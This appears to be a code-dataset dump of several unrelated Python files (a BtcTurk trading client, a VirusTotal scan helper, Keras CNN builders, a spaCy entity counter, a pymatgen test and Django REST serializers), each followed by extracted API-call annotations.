params={"quantity": quantity ,"price": price,"stopPrice": 0, "newOrderClientId":"BtcTurk API", "orderMethod":"limit", "orderType":"sell", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def limit_buy(self, pair_symbol, quantity, price):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": price,"stopPrice": 0, "newOrderClientId":"BtcTurk API", "orderMethod":"limit", "orderType":"buy", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def stop_sell(self, pair_symbol, quantity, price, stop_price):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": price,"stopPrice": stop_price, "newOrderClientId":"BtcTurk API", "orderMethod":"stoplimit", "orderType":"sell", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def stop_buy(self, pair_symbol, quantity, price, stop_price):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": price,"stopPrice": stop_price, "newOrderClientId":"BtcTurk API", "orderMethod":"stoplimit", "orderType":"buy", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
| [
"hmac.new",
"base64.b64encode",
"json.dumps",
"base64.b64decode",
"requests.get",
"time.time"
] | [((3775, 3803), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (3785, 3803), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((4040, 4068), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (4050, 4068), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((5281, 5309), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (5291, 5309), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((5728, 5756), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (5738, 5756), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((6184, 6212), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (6194, 6212), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((6638, 6666), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (6648, 6666), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((7118, 7146), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (7128, 7146), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((7596, 7624), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (7606, 7624), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1171, 1192), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (1183, 1192), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1247, 1275), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (1257, 1275), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1390, 1411), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (1402, 1411), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1466, 1494), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (1476, 1494), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1686, 1707), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (1698, 1707), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1762, 1790), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (1772, 1790), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1995, 2016), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (2007, 2016), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((2071, 2099), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (2081, 2099), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((2430, 2451), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (2442, 2451), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((2506, 2534), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (2516, 2534), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((3375, 3396), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (3387, 3396), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((3451, 3479), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (3461, 3479), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((4375, 4403), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (4385, 4403), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((4755, 4783), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (4765, 4783), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((425, 458), 'base64.b64decode', 'base64.b64decode', (['self.api_Secret'], {}), '(self.api_Secret)\n', (441, 458), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((691, 718), 'base64.b64encode', 'base64.b64encode', (['signature'], {}), '(signature)\n', (707, 718), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((2911, 2945), 'requests.get', 'requests.get', ([], {'url': "(uri + '&' + last)"}), "(url=uri + '&' + last)\n", (2923, 2945), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((3006, 3034), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (3016, 3034), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((612, 653), 'hmac.new', 'hmac.new', (['apiSecret', 'data', 'hashlib.sha256'], {}), '(apiSecret, data, hashlib.sha256)\n', (620, 653), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((491, 502), 'time.time', 'time.time', ([], {}), '()\n', (500, 502), False, 'import time, base64, hmac, hashlib, json, requests\n')] |
import os
from pathlib import Path
from moonleap.utils.case import sn
from titan.project_pkg.dockercompose import DockerComposeConfig
def _make_abs(service, p):
result = Path(p)
if not Path(os.path.expandvars(p)).is_absolute():
base_path = Path("/opt") / sn(service.project.name) / service.name
result = base_path / p
return result
def get(opt_dir):
def inner():
service = opt_dir.service
body = {}
volumes = body.setdefault("volumes", [])
for tool in service.tools:
for opt_path in tool.opt_paths.merged:
from_path = _make_abs(service, opt_path.from_path)
to_path = _make_abs(service, opt_path.to_path)
volumes.append(f"{str(from_path)}:{str(to_path)}")
return body
return DockerComposeConfig(
get_service_body=lambda x, service_name: inner(),
get_global_body=lambda x, service_name: {},
is_dev=True,
is_override=True,
)
| [
"os.path.expandvars",
"moonleap.utils.case.sn",
"pathlib.Path"
] | [((177, 184), 'pathlib.Path', 'Path', (['p'], {}), '(p)\n', (181, 184), False, 'from pathlib import Path\n'), ((259, 271), 'pathlib.Path', 'Path', (['"""/opt"""'], {}), "('/opt')\n", (263, 271), False, 'from pathlib import Path\n'), ((274, 298), 'moonleap.utils.case.sn', 'sn', (['service.project.name'], {}), '(service.project.name)\n', (276, 298), False, 'from moonleap.utils.case import sn\n'), ((201, 222), 'os.path.expandvars', 'os.path.expandvars', (['p'], {}), '(p)\n', (219, 222), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 24 23:15:17 2020
@author: <NAME>
"""
import requests
def mals(file_dest):
url = 'https://www.virustotal.com/vtapi/v2/file/scan'
params = {'apikey': '<KEY>'}
files = {'file': (file_dest, open(file_dest, 'rb'))}
response = requests.post(url, files=files, params=params)
#print(response.json())
res=response.json()['resource']
#print (res)
url = 'https://www.virustotal.com/vtapi/v2/file/report'
params = {'apikey': '<KEY>', 'resource': res}
response = requests.get(url, params=params)
if ('positives' in response.json()):
print (response.json()['positives'])
if(int(response.json()['positives'])>0):
return 1
else:
return 0
else:
return 2 | [
"requests.post",
"requests.get"
] | [((320, 366), 'requests.post', 'requests.post', (['url'], {'files': 'files', 'params': 'params'}), '(url, files=files, params=params)\n', (333, 366), False, 'import requests\n'), ((597, 629), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (609, 629), False, 'import requests\n')] |
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 14 10:05:08 2018
Modified on Tue Nov 12 21:19:10 2019
@author1: <NAME>
@author2: <NAME>
"""
import keras.layers as L
import keras
import matplotlib.pyplot as plt
# get_model()
def get_model():
print("build_model.py..get_model().start...")
'''
return:
base model for training
#--------------------------#
Does this function prepare for transfer learning? From Ruixin Lee
#--------------------------#
'''
input = L.Input(shape=(48, 48, 1))
x = L.Conv2D(32, (3, 3), activation='relu', padding='same')(input)
x = L.Conv2D(32, (3, 3), activation='relu')(x)
x = L.Conv2D(64, (3, 3), activation='relu')(x)
x = L.Dropout(0.5)(x)
x = L.MaxPooling2D(pool_size=(3, 3))(x)
# Flatten vector
x = L.Flatten(name='bottleneck')(x)
x = L.Dense(64, activation='relu')(x)
x = L.Dropout(0.5)(x)
output = L.Dense(7, activation='softmax')(x)
model = keras.Model(input=input, output = output)
print("model1__summary:")
print(model.summary())
# model.compile(optimizer=keras.optimizers.Adadelta(), loss='categorical_crossentropy', metrics=['accuracy'])
print("build_model.py..get_model().end...")
return model
# get_model()
def get_model2():
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D
import keras
model = Sequential()
model.add(
keras.layers.Input(
shape=(48, 48, 1)
)
)
model.add(
Conv2D(
filters=32,
kernel_size=(3, 3),
activation='relu',
padding="same"
)
)
model.add(
Conv2D(
filters=32,
kernel_size=(3, 3),
activation='relu'
)
)
model.add(
Conv2D(
filters=64,
kernel_size=(3, 3),
activation='relu'
)
)
model.add(Dropout(0.5))
model.add(MaxPool2D(pool_size=(3, 3)))
model.add(Flatten(name="bottleneck"))
model.add(Dense(64, activation='relu'))
model.add(Dropout(rate=0.5))
model.add(Dense(7, activation='softmax'))
print("model2__summary:")
print(model.summary())
# model.compile(
# loss='categorical_crossentropy',
# optimizer=keras.optimizers.Adadelta(), metrics=['accuracy']
# )
#-------------------------#
# input = L.Input(shape=(48, 48, 1))
#
# x = L.Conv2D(32, (3, 3), activation='relu', padding='same')(input)
# x = L.Conv2D(32, (3, 3), activation='relu')(x)
# x = L.Conv2D(64, (3, 3), activation='relu')(x)
# x = L.Dropout(0.5)(x)
#
# x = L.MaxPooling2D(pool_size=(3, 3))(x)
#
# # Flatten vector
# x = L.Flatten(name='bottleneck')(x)
# x = L.Dense(64, activation='relu')(x)
# x = L.Dropout(0.5)(x)
# output = L.Dense(7, activation='softmax')(x)
#
# model = keras.Model(input=input, output=output)
#
# model.compile(optimizer=keras.optimizers.Adadelta(), loss='categorical_crossentropy', metrics=['accuracy'])
#
# print("build_model.py..get_model().end...")
return model
# plot_training(history, filename)
def plot_training(history, filename):
print("build_model.py..plot_training(history, filename).start...")
'''
plot the train data image
'''
output_acc = history.history['acc']
val_output_acc = history.history['val_acc']
output_loss = history.history['loss']
val_output_loss = history.history['val_loss']
epochs = range(len(val_output_acc))
plt.figure()
plt.plot(epochs, output_acc, 'b-', label='train accuracy')
plt.plot(epochs, val_output_acc, 'r-', label='validation accuracy')
plt.legend(loc='best')
plt.title('Training and validation accuracy')
plt.savefig(filename+'_accuray'+'.png')
plt.figure()
plt.plot(epochs, output_loss, 'b-', label='train loss')
plt.plot(epochs, val_output_loss, 'r-', label='validation loss')
plt.legend(loc='best')
plt.title('Training and validation loss')
plt.savefig(filename+'_loss' + '.png')
print("build_model.py..plot_training(history, filename).end...")
return 0
# plot_training(history, filename)
# __main__
if __name__ == '__main__':
print("build_model.py..__main__.start...")
get_model()
get_model2()
print("build_model.py..__main__.end...")
# __main__
| [
"keras.layers.Conv2D",
"matplotlib.pyplot.savefig",
"keras.layers.Flatten",
"keras.layers.MaxPooling2D",
"keras.Model",
"matplotlib.pyplot.plot",
"keras.models.Sequential",
"keras.layers.Input",
"matplotlib.pyplot.figure",
"keras.layers.Dense",
"matplotlib.pyplot.title",
"keras.layers.MaxPool2... | [((526, 552), 'keras.layers.Input', 'L.Input', ([], {'shape': '(48, 48, 1)'}), '(shape=(48, 48, 1))\n', (533, 552), True, 'import keras.layers as L\n'), ((996, 1035), 'keras.Model', 'keras.Model', ([], {'input': 'input', 'output': 'output'}), '(input=input, output=output)\n', (1007, 1035), False, 'import keras\n'), ((1506, 1518), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1516, 1518), False, 'from keras.models import Sequential\n'), ((3692, 3704), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (3702, 3704), True, 'import matplotlib.pyplot as plt\n'), ((3709, 3767), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'output_acc', '"""b-"""'], {'label': '"""train accuracy"""'}), "(epochs, output_acc, 'b-', label='train accuracy')\n", (3717, 3767), True, 'import matplotlib.pyplot as plt\n'), ((3772, 3839), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_output_acc', '"""r-"""'], {'label': '"""validation accuracy"""'}), "(epochs, val_output_acc, 'r-', label='validation accuracy')\n", (3780, 3839), True, 'import matplotlib.pyplot as plt\n'), ((3844, 3866), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (3854, 3866), True, 'import matplotlib.pyplot as plt\n'), ((3871, 3916), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and validation accuracy"""'], {}), "('Training and validation accuracy')\n", (3880, 3916), True, 'import matplotlib.pyplot as plt\n'), ((3921, 3964), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '_accuray' + '.png')"], {}), "(filename + '_accuray' + '.png')\n", (3932, 3964), True, 'import matplotlib.pyplot as plt\n'), ((3970, 3982), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (3980, 3982), True, 'import matplotlib.pyplot as plt\n'), ((3987, 4042), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'output_loss', '"""b-"""'], {'label': '"""train loss"""'}), "(epochs, output_loss, 'b-', label='train loss')\n", (3995, 4042), True, 'import matplotlib.pyplot as plt\n'), ((4047, 4111), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_output_loss', '"""r-"""'], {'label': '"""validation loss"""'}), "(epochs, val_output_loss, 'r-', label='validation loss')\n", (4055, 4111), True, 'import matplotlib.pyplot as plt\n'), ((4117, 4139), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (4127, 4139), True, 'import matplotlib.pyplot as plt\n'), ((4144, 4185), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and validation loss"""'], {}), "('Training and validation loss')\n", (4153, 4185), True, 'import matplotlib.pyplot as plt\n'), ((4190, 4230), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '_loss' + '.png')"], {}), "(filename + '_loss' + '.png')\n", (4201, 4230), True, 'import matplotlib.pyplot as plt\n'), ((562, 617), 'keras.layers.Conv2D', 'L.Conv2D', (['(32)', '(3, 3)'], {'activation': '"""relu"""', 'padding': '"""same"""'}), "(32, (3, 3), activation='relu', padding='same')\n", (570, 617), True, 'import keras.layers as L\n'), ((633, 672), 'keras.layers.Conv2D', 'L.Conv2D', (['(32)', '(3, 3)'], {'activation': '"""relu"""'}), "(32, (3, 3), activation='relu')\n", (641, 672), True, 'import keras.layers as L\n'), ((684, 723), 'keras.layers.Conv2D', 'L.Conv2D', (['(64)', '(3, 3)'], {'activation': '"""relu"""'}), "(64, (3, 3), activation='relu')\n", (692, 723), True, 'import keras.layers as L\n'), ((735, 749), 'keras.layers.Dropout', 'L.Dropout', (['(0.5)'], {}), '(0.5)\n', (744, 749), True, 'import keras.layers as L\n'), ((766, 798), 'keras.layers.MaxPooling2D', 'L.MaxPooling2D', ([], {'pool_size': '(3, 3)'}), '(pool_size=(3, 3))\n', (780, 798), True, 'import keras.layers as L\n'), ((832, 860), 'keras.layers.Flatten', 'L.Flatten', ([], {'name': '"""bottleneck"""'}), "(name='bottleneck')\n", (841, 860), True, 'import keras.layers as L\n'), ((872, 902), 'keras.layers.Dense', 'L.Dense', (['(64)'], {'activation': '"""relu"""'}), "(64, activation='relu')\n", (879, 902), True, 'import keras.layers as L\n'), ((914, 928), 'keras.layers.Dropout', 'L.Dropout', (['(0.5)'], {}), '(0.5)\n', (923, 928), True, 'import keras.layers as L\n'), ((945, 977), 'keras.layers.Dense', 'L.Dense', (['(7)'], {'activation': '"""softmax"""'}), "(7, activation='softmax')\n", (952, 977), True, 'import keras.layers as L\n'), ((1542, 1579), 'keras.layers.Input', 'keras.layers.Input', ([], {'shape': '(48, 48, 1)'}), '(shape=(48, 48, 1))\n', (1560, 1579), False, 'import keras\n'), ((1631, 1704), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(32)', 'kernel_size': '(3, 3)', 'activation': '"""relu"""', 'padding': '"""same"""'}), "(filters=32, kernel_size=(3, 3), activation='relu', padding='same')\n", (1637, 1704), False, 'from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D\n'), ((1792, 1849), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(32)', 'kernel_size': '(3, 3)', 'activation': '"""relu"""'}), "(filters=32, kernel_size=(3, 3), activation='relu')\n", (1798, 1849), False, 'from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D\n'), ((1925, 1982), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(64)', 'kernel_size': '(3, 3)', 'activation': '"""relu"""'}), "(filters=64, kernel_size=(3, 3), activation='relu')\n", (1931, 1982), False, 'from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D\n'), ((2049, 2061), 'keras.layers.Dropout', 'Dropout', (['(0.5)'], {}), '(0.5)\n', (2056, 2061), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2077, 2104), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(3, 3)'}), '(pool_size=(3, 3))\n', (2086, 2104), False, 'from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D\n'), ((2120, 2146), 'keras.layers.Flatten', 'Flatten', ([], {'name': '"""bottleneck"""'}), "(name='bottleneck')\n", (2127, 2146), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2162, 2190), 'keras.layers.Dense', 'Dense', (['(64)'], {'activation': '"""relu"""'}), "(64, activation='relu')\n", (2167, 2190), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2206, 2223), 'keras.layers.Dropout', 'Dropout', ([], {'rate': '(0.5)'}), '(rate=0.5)\n', (2213, 2223), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2239, 2269), 'keras.layers.Dense', 'Dense', (['(7)'], {'activation': '"""softmax"""'}), "(7, activation='softmax')\n", (2244, 2269), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n')] |
import pandas as pd
import time
from contextlib import contextmanager
from tqdm import tqdm
tqdm.pandas()
# nice way to report running times
@contextmanager
def timer(name):
t0 = time.time()
yield
print(f'[{name}] done in {time.time() - t0:.0f} s')
def get_named_entities(df):
"""
Count the named entities that are neither A nor B.
Hopefully this correlates with class "Neither".
:param df: competition data with one extra field spacy_nlp_doc: precomputed nlp(text)
:return:
"""
named_df = pd.DataFrame(0, index=df.index, columns=["named_ent"])
with timer('Extracting named entities'):
for i in range(len(df)):
doc = df.loc[i, "spacy_nlp_doc"]
A = df.loc[i, "A"]
B = df.loc[i, "B"]
A_offset = df.loc[i, "A-offset"]
B_offset = df.loc[i, "B-offset"]
P_offset = df.loc[i, "Pronoun-offset"]
# count persons that are not A or B
# spacy's entities are spans, not tokens
# e.g. "<NAME>" is one entity
ent_list = [ent for ent in doc.ents if (ent.label_ == "PERSON" and ent.text != A and ent.text != B)]
named_df.loc[i, "named_ent"] = len(ent_list)
return named_df
| [
"pandas.DataFrame",
"tqdm.tqdm.pandas",
"time.time"
] | [((93, 106), 'tqdm.tqdm.pandas', 'tqdm.pandas', ([], {}), '()\n', (104, 106), False, 'from tqdm import tqdm\n'), ((186, 197), 'time.time', 'time.time', ([], {}), '()\n', (195, 197), False, 'import time\n'), ((537, 591), 'pandas.DataFrame', 'pd.DataFrame', (['(0)'], {'index': 'df.index', 'columns': "['named_ent']"}), "(0, index=df.index, columns=['named_ent'])\n", (549, 591), True, 'import pandas as pd\n'), ((238, 249), 'time.time', 'time.time', ([], {}), '()\n', (247, 249), False, 'import time\n')] |
from monty.dev import deprecated
import pytest
from pymatgen.core import Structure, Composition
from pymatgen.util.testing import PymatgenTest
from emmet.core.chemenv import ChemEnvDoc
test_structures = {
name: struc.get_reduced_structure()
for name, struc in PymatgenTest.TEST_STRUCTURES.items()
if name
in [
"SiO2",
"Li2O",
"LiFePO4",
"TlBiSe2",
"K2O2",
"Li3V2(PO4)3",
"Li2O2",
"CsCl",
"NaFePO4",
"Pb2TiZrO6",
"SrTiO3",
"TiO2",
"BaNiO3",
"VO2",
]
}
@pytest.mark.parametrize("structure", test_structures.values())
def test_chemenv(structure: Structure):
"""Very simple test to make sure this actually works"""
print(f"Should work : {structure.composition}")
doc = ChemEnvDoc.from_structure(
structure=structure, material_id=33, deprecated=False
)
valences = [getattr(site.specie, "oxi_state", None) for site in structure]
valences = [v for v in valences if v is not None]
if len(valences) == len(structure):
assert doc.dict()["warnings"] is None
elif structure.composition.almost_equals(Composition("CsCl")):
# We do not have reference polyhedra above a certain number of neighbors.
# ChemEnv cannot deliver an answer without oxidation states.
assert doc.dict()["warnings"] == "ChemEnv algorithm failed"
else:
assert (
doc.dict()["warnings"]
== "No oxidation states. Analysis will now include all bonds"
)
| [
"pymatgen.util.testing.PymatgenTest.TEST_STRUCTURES.items",
"emmet.core.chemenv.ChemEnvDoc.from_structure",
"pymatgen.core.Composition"
] | [((813, 898), 'emmet.core.chemenv.ChemEnvDoc.from_structure', 'ChemEnvDoc.from_structure', ([], {'structure': 'structure', 'material_id': '(33)', 'deprecated': '(False)'}), '(structure=structure, material_id=33, deprecated=False\n )\n', (838, 898), False, 'from emmet.core.chemenv import ChemEnvDoc\n'), ((270, 306), 'pymatgen.util.testing.PymatgenTest.TEST_STRUCTURES.items', 'PymatgenTest.TEST_STRUCTURES.items', ([], {}), '()\n', (304, 306), False, 'from pymatgen.util.testing import PymatgenTest\n'), ((1172, 1191), 'pymatgen.core.Composition', 'Composition', (['"""CsCl"""'], {}), "('CsCl')\n", (1183, 1191), False, 'from pymatgen.core import Structure, Composition\n')] |
"""Defines the serializers for Scale files and workspaces"""
from __future__ import unicode_literals
import rest_framework.serializers as serializers
from rest_framework.fields import CharField
from util.rest import ModelIdSerializer
class DataTypeField(CharField):
"""Field for displaying the list of data type tags for a Scale file"""
type_name = 'DataTypeField'
type_label = 'datatype'
def to_representation(self, value):
"""Converts the model field to a list of data type tags
:param value: the comma-separated data types for the Scale file
:type value: str
:rtype: list of str
:returns: the list of data type tags
"""
tags = []
if value:
for tag in value.split(','):
tags.append(tag)
return tags
class WktField(CharField):
"""Field for displaying geometry objects as Well Known Text"""
type_name = 'WktField'
type_label = 'wtk'
def to_representation(self, value):
"""Converts the model field to WKT
:param value: the associated geometry info
:type value: GEOSGeometry
:rtype: string
:returns: the WKT representation
"""
if value:
return value.wkt
class GeoJsonField(CharField):
"""Field for displaying geometry objects as Well Known Text"""
type_name = 'GeoJsonField'
type_label = 'geojson'
def to_representation(self, value):
"""Converts the model field to GeoJson
:param value: the associated geometry info
:type value: GEOSGeometry
:rtype: string
:returns: the GeoJson representation
"""
if value:
return value.geojson
class WorkspaceBaseSerializer(ModelIdSerializer):
"""Converts workspace model fields to REST output"""
name = serializers.CharField()
class WorkspaceSerializer(WorkspaceBaseSerializer):
"""Converts workspace model fields to REST output"""
title = serializers.CharField()
description = serializers.CharField()
base_url = serializers.URLField()
is_active = serializers.BooleanField()
used_size = serializers.IntegerField() # TODO: BigIntegerField?
total_size = serializers.IntegerField() # TODO: BigIntegerField?
created = serializers.DateTimeField()
archived = serializers.DateTimeField()
last_modified = serializers.DateTimeField()
class WorkspaceDetailsSerializer(WorkspaceSerializer):
"""Converts workspace model fields to REST output"""
json_config = serializers.JSONField(default=dict)
class ScaleFileBaseSerializerV5(ModelIdSerializer):
"""Converts Scale file model fields to REST output"""
workspace = WorkspaceBaseSerializer()
file_name = serializers.CharField()
media_type = serializers.CharField()
file_type = serializers.CharField()
file_size = serializers.IntegerField() # TODO: BigIntegerField?
data_type = DataTypeField()
is_deleted = serializers.BooleanField()
uuid = serializers.CharField()
url = serializers.URLField()
created = serializers.DateTimeField()
deleted = serializers.DateTimeField()
data_started = serializers.DateTimeField()
data_ended = serializers.DateTimeField()
source_started = serializers.DateTimeField()
source_ended = serializers.DateTimeField()
last_modified = serializers.DateTimeField()
class ScaleFileBaseSerializerV6(ModelIdSerializer):
"""Converts Scale file model fields to REST output"""
file_name = serializers.CharField()
class ScaleFileSerializerV5(ScaleFileBaseSerializerV5):
"""Converts Scale file model fields to REST output"""
file_path = serializers.CharField()
# TODO: update to use GeoJson instead of WKT
geometry = WktField()
center_point = WktField()
meta_data = serializers.JSONField(default=dict)
countries = serializers.StringRelatedField(many=True, read_only=True)
class ScaleFileSerializerV6(ScaleFileBaseSerializerV6):
"""Converts Scale file model fields to REST output"""
from batch.serializers import BatchBaseSerializerV6
from job.serializers import JobTypeBaseSerializerV6
from recipe.serializers import RecipeTypeBaseSerializerV6
workspace = WorkspaceBaseSerializer()
media_type = serializers.CharField()
file_type = serializers.CharField()
file_size = serializers.IntegerField() # TODO: BigIntegerField?
file_path = serializers.CharField()
is_deleted = serializers.BooleanField()
url = serializers.URLField()
created = serializers.DateTimeField()
deleted = serializers.DateTimeField()
data_started = serializers.DateTimeField()
data_ended = serializers.DateTimeField()
source_started = serializers.DateTimeField()
source_ended = serializers.DateTimeField()
last_modified = serializers.DateTimeField()
# TODO: update to use GeoJson instead of WKT
geometry = WktField()
center_point = WktField()
countries = serializers.StringRelatedField(many=True, read_only=True)
job_type = JobTypeBaseSerializerV6()
job = ModelIdSerializer()
job_exe = ModelIdSerializer()
job_output = serializers.CharField()
recipe_type = RecipeTypeBaseSerializerV6()
recipe = ModelIdSerializer()
recipe_node = serializers.CharField()
batch = BatchBaseSerializerV6()
is_superseded = serializers.BooleanField()
superseded = serializers.DateTimeField()
class ScaleFileDetailsSerializerV6(ScaleFileSerializerV6):
"""Converts file model fields to REST output"""
meta_data = serializers.JSONField(default=dict)
| [
"rest_framework.serializers.DateTimeField",
"batch.serializers.BatchBaseSerializerV6",
"rest_framework.serializers.IntegerField",
"rest_framework.serializers.BooleanField",
"rest_framework.serializers.URLField",
"rest_framework.serializers.JSONField",
"rest_framework.serializers.StringRelatedField",
"... | [((1848, 1871), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (1869, 1871), True, 'import rest_framework.serializers as serializers\n'), ((1995, 2018), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2016, 2018), True, 'import rest_framework.serializers as serializers\n'), ((2037, 2060), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2058, 2060), True, 'import rest_framework.serializers as serializers\n'), ((2076, 2098), 'rest_framework.serializers.URLField', 'serializers.URLField', ([], {}), '()\n', (2096, 2098), True, 'import rest_framework.serializers as serializers\n'), ((2115, 2141), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {}), '()\n', (2139, 2141), True, 'import rest_framework.serializers as serializers\n'), ((2159, 2185), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {}), '()\n', (2183, 2185), True, 'import rest_framework.serializers as serializers\n'), ((2229, 2255), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {}), '()\n', (2253, 2255), True, 'import rest_framework.serializers as serializers\n'), ((2297, 2324), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (2322, 2324), True, 'import rest_framework.serializers as serializers\n'), ((2340, 2367), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (2365, 2367), True, 'import rest_framework.serializers as serializers\n'), ((2388, 2415), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (2413, 2415), True, 'import rest_framework.serializers as serializers\n'), ((2548, 2583), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ([], {'default': 'dict'}), '(default=dict)\n', (2569, 2583), True, 'import rest_framework.serializers as serializers\n'), ((2755, 2778), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2776, 2778), True, 'import rest_framework.serializers as serializers\n'), ((2796, 2819), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2817, 2819), True, 'import rest_framework.serializers as serializers\n'), ((2836, 2859), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2857, 2859), True, 'import rest_framework.serializers as serializers\n'), ((2876, 2902), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {}), '()\n', (2900, 2902), True, 'import rest_framework.serializers as serializers\n'), ((2978, 3004), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {}), '()\n', (3002, 3004), True, 'import rest_framework.serializers as serializers\n'), ((3016, 3039), 'rest_framework.serializers.CharField', 